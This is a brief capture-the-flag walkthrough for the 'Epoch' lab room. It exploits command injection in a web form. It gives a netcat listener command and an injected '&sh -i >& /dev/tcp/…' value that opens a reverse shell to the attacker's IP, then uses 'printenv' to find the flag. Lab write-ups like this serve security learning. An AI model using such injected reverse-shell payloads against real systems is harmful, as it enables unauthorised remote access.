Author: AMD
This is a writeup for Epoch room.
My target IP: 10.10.218.15
VISIT WEB PAGE
If we read the room explanation “Our website actually just passes your input right along to that command-line program!” we can see that we might be able to run commands. So lets try it.
Perfect, we can run commands. Lets find a way to get in.
REVERSE SHELL
Visit https://www.revshells.com/ and use your pc’s IP to handle the condiguration.
run “nc -lvnp 9001”
input “&sh -i >& /dev/tcp/10.10.244.218/9001 0>&1”
GET THE FLAG
When we look around we can not find the flag. Lets look at the hint: “The developer likes to store data in environment variables, can you find anything of interest there?”
Lets try “printenv” to see the environment variables.
